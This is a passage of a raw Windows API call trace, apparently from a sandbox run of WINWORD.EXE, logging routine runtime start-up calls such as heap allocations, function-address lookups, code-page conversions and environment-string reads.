RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x364) returned 0xcaa3a10 [0124.834] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0124.834] SetLastError (dwErrCode=0x3f0) [0124.834] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xc00) returned 0xc879820 [0124.837] GetStartupInfoW (in: lpStartupInfo=0x19761c | out: lpStartupInfo=0x19761c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x11b796a0, hStdOutput=0xaafdba3e, hStdError=0xfffffffe)) [0124.837] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.837] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0124.837] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.837] GetCommandLineA () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0124.837] GetCommandLineW () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0124.837] GetLastError () returned 0x3f0 [0124.837] SetLastError (dwErrCode=0x3f0) [0124.837] GetLastError () returned 0x3f0 [0124.837] SetLastError (dwErrCode=0x3f0) [0124.837] GetACP () returned 0x4e4 [0124.837] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x220) returned 0xcadbb90 [0124.837] IsValidCodePage (CodePage=0x4e4) returned 1 [0124.838] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19764c | out: lpCPInfo=0x19764c) returned 1 [0124.838] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x196f14 | out: lpCPInfo=0x196f14) returned 1 [0124.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196cb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.838] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x196f28 | out: lpCharType=0x196f28) returned 1 [0124.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.838] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.838] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.839] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x769b95f0 [0124.839] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0124.839] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0124.839] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x197428, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0124.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.840] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0124.840] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0124.840] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x197328, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0124.840] RtlInitializeSListHead (in: ListHead=0x11bda0e8 | out: ListHead=0x11bda0e8) [0124.840] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76720000 [0124.841] GetProcAddress (hModule=0x76720000, lpProcName="FlsAlloc") returned 0x7673a980 [0124.841] GetProcAddress (hModule=0x76720000, lpProcName="FlsFree") returned 0x76744ff0 [0124.842] GetProcAddress (hModule=0x76720000, lpProcName="FlsGetValue") returned 0x76737570 [0124.842] GetProcAddress (hModule=0x76720000, lpProcName="FlsSetValue") returned 0x76739e30 [0124.843] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSectionEx") returned 0x76746740 [0124.844] GetProcAddress (hModule=0x76720000, lpProcName="InitOnceExecuteOnce") returned 0x769cc2d0 [0124.845] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventExW") returned 0x767466a0 [0124.845] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreW") returned 0x76746710 [0124.846] GetProcAddress (hModule=0x76720000, lpProcName="CreateSemaphoreExW") returned 0x76746700 [0124.847] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolTimer") returned 0x7673ace0 [0124.984] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolTimer") returned 0x77217dc0 [0124.985] GetProcAddress (hModule=0x76720000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77224010 [0124.986] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolTimer") returned 0x77222a50 [0124.986] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWait") returned 0x7673a7b0 [0124.987] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadpoolWait") returned 0x77222290 [0124.987] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWait") returned 0x77222910 [0124.989] GetProcAddress (hModule=0x76720000, lpProcName="FlushProcessWriteBuffers") returned 0x77247a60 [0124.989] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7723ac00 [0124.990] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcessorNumber") returned 0x7722a890 [0124.990] GetProcAddress (hModule=0x76720000, lpProcName="CreateSymbolicLinkW") returned 0x76760830 [0124.991] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentPackageId") returned 0x769cded0 [0124.991] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount64") returned 0x76733630 [0124.992] GetProcAddress (hModule=0x76720000, lpProcName="GetFileInformationByHandleEx") returned 0x76760ea0 [0124.993] GetProcAddress (hModule=0x76720000, lpProcName="SetFileInformationByHandle") returned 0x76746c30 [0124.993] GetProcAddress (hModule=0x76720000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x76746cf0 [0124.994] GetProcAddress (hModule=0x76720000, lpProcName="InitializeConditionVariable") returned 0x771f6710 [0124.995] GetProcAddress (hModule=0x76720000, lpProcName="WakeConditionVariable") returned 0x7723c720 [0124.996] GetProcAddress (hModule=0x76720000, lpProcName="WakeAllConditionVariable") returned 0x77238d70 [0124.997] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableCS") returned 0x76a47f60 [0124.997] GetProcAddress (hModule=0x76720000, lpProcName="InitializeSRWLock") returned 0x771f6710 [0124.998] GetProcAddress (hModule=0x76720000, lpProcName="AcquireSRWLockExclusive") returned 0x7721d210 [0124.998] GetProcAddress (hModule=0x76720000, lpProcName="TryAcquireSRWLockExclusive") returned 0x771f3650 [0124.999] GetProcAddress (hModule=0x76720000, lpProcName="ReleaseSRWLockExclusive") returned 0x7721d080 [0125.000] GetProcAddress (hModule=0x76720000, lpProcName="SleepConditionVariableSRW") returned 0x76a47fb0 [0125.000] GetProcAddress (hModule=0x76720000, lpProcName="CreateThreadpoolWork") returned 0x7673ea00 [0125.001] GetProcAddress (hModule=0x76720000, lpProcName="SubmitThreadpoolWork") returned 0x7721ce10 [0125.001] GetProcAddress (hModule=0x76720000, lpProcName="CloseThreadpoolWork") returned 0x77220550 [0125.002] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringEx") returned 0x7673ff80 [0125.002] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoEx") returned 0x7673a750 [0125.003] GetProcAddress (hModule=0x76720000, lpProcName="LCMapStringEx") returned 0x76739a10 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x800) returned 0xb3def90 [0125.004] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0125.004] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x11bda8f0, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe")) returned 0x3c [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4c) returned 0xcad18b0 [0125.004] GetEnvironmentStringsW () returned 0xf593610* [0125.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1556, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1556 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x614) returned 0xc983aa8 [0125.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1556, lpMultiByteStr=0xc983aa8, cbMultiByte=1556, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1556 [0125.004] FreeEnvironmentStringsW (penv=0xf593610) returned 1 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa0) returned 0xf5c7ee0 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1f) returned 0xcb21150 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0xcb14ef0 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x37) returned 0xcb09560 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c) returned 0xcb2a2a8 [0125.004] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0xcb09260 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0xc83db80 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0xc844400 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0xcb09120 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x28) returned 0xc844520 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xd) returned 0xcac4758 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1d) returned 0xcb211c8 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x31) returned 0xcb08ee0 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x15) returned 0xc83e080 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17) returned 0xc83de00 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe) returned 0xcac4680 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x69) returned 0xca16220 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3e) returned 0xcb2a578 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1b) returned 0xcb213d0 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1d) returned 0xcb21380 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x48) returned 0xca9caf0 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0xc83de40 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0xc83de60 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1b) returned 0xcb21448 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0xc844670 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x29) returned 0xcb14f98 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1e) returned 0xcb21470 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x6b) returned 0xca16310 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x17) returned 0xc83e2c0 [0125.005] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0xc83e4a0 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xf) returned 0xcac4530 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0xc83e320 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2a) returned 0xcb14a20 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x29) returned 0xcb14ba8 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0xc83e4c0 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x21) returned 0xc8442e0 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x16) returned 0xc83e560 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x22) returned 0xc8441c0 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0xc83e4e0 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x92) returned 0xc96b2a8 [0125.006] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0xc983aa8 | out: hHeap=0x440000) returned 1 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x80) returned 0xc988e78 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x8) returned 0xcb27b68 [0125.006] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20) returned 0xcb21178 [0125.007] RtlAllocateHeap (HeapHandle=0x440000, 